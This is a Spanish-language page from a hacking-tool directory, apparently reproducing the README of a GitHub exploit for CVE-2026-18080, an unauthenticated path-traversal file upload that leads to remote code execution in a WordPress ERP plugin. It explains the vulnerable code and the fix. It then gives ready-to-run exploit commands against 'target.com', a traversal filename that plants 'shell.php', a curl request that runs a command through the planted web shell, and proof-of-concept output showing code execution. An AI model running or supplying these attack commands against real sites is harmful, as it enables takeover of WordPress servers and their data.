Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
By-Poloss..-..CVE-2026-18080 — Exploit para CVE-2026-18080, una subida arbitraria de archivos sin autenticación que conduce a RCE en ERP Complete HR, Accounting & CRM Suite. Incluye scripts en Python y PHP para la explotación automatizada. | Kitploit
Herramientas/GitHubGitHub/polosss/by-poloss..-..cve-2026-18080
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed TeamingDesarrollo de Payloads
GitHubpolosss/by-poloss..-..cve-2026-18080

By-Poloss..-..CVE-2026-18080

Exploit para CVE-2026-18080, una subida arbitraria de archivos sin autenticación que conduce a RCE en ERP Complete HR, Accounting & CRM Suite. Incluye scripts en Python y PHP para la explotación automatizada.

Ver Repositorio
hace 19h 38mAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-18080 — ERP Complete HR, Accounting & CRM Suite <= 1.17.7

Subida Arbitraria de Archivos sin Autenticación mediante Adjuntos IMAP de CRM Email Connect (Path Traversal → RCE)

CampoValor
CVEhttps://nvd.nist.gov/vuln/detail/CVE-2026-18080
Wordfencehttps://www.wordfence.com/threat-intel/vulnerabilities/id/b9d11eb9-5e18-459f-a9d4-cccb1d593402
Parchehttps://plugins.trac.wordpress.org/changeset/3656848/erp
CVSS9.8 (Crítico)
CWECWE-434 (Subida sin Restricciones de Archivos con Tipo Peligroso)
AfectadosVersiones del plugin ERP <= 1.17.7 (corregido en 1.17.8)

Descripción

La función save_attachments() del plugin ERP en GmailSync.php procesa los adjuntos de correo entrantes desde IMAP sin normalización de rutas. Un atacante puede crear un correo con un nombre de archivo como ../../plugins/shell.php y una cabecera References falsificada que coincida con el patrón esperado por el plugin. El trabajo de sincronización IMAP basado en cron escribe el archivo fuera del directorio crm-attachments/ protegido por .htaccess en cualquier ruta escribible dentro de wp-content/.

Causa Raíz

En GmailSync.php (v1.17.7):

root@kitploit:~
$name = $item['name'];              // Sin basename() ni normalización de rutas
$file = wp_check_filetype( $item['name'] );
// ...
$saved = $wp_filesystem->put_contents( $dir . $name, $item['data'] );

El nombre de archivo ../../plugins/shell.php concatenado con $dir (wp-content/uploads/crm-attachments/) se resuelve a wp-content/plugins/shell.php — un directorio donde se permite la ejecución de PHP.

La corrección (v1.17.8) añade sanitize_attachment_filename() que elimina los componentes de directorio mediante basename(), rechaza los separadores de ruta y bloquea las extensiones peligrosas.

Explotación

Método 1: Directo (wp-cli)

root@kitploit:~
python3 exploit.py -t https://wordpress.ddev.site

Método 2: Ruta personalizada y nombre de shell

root@kitploit:~
python3 exploit.py -t https://target.com --shell evil.php --path themes

Método 3: Sonda phpinfo

root@kitploit:~
python3 exploit.py -t https://target.com --phpinfo

Después de una subida exitosa:

root@kitploit:~
curl -X POST -d 'cmd=id' 'https://target.com/wp-content/plugins/cve-2026-18080.php'

Prueba de Concepto

root@kitploit:~
RESULT: [{"name":"../../plugins/cve-2026-18080.php","slug":"../../plugins/cve-2026-18080.php","path":".../crm-attachments/../../plugins/cve-2026-18080.php"}]
SUCCESS: wp-content/plugins/cve-2026-18080.php (57 bytes)
RCE: uid=1000(god) gid=1000(god)

Archivos

ArchivoDescripción
exploit.pyScript de explotación en Python que usa wp-cli
exploit.phpExploit PHP independiente para wp eval-file
README.mdEste archivo
Descargar herramienta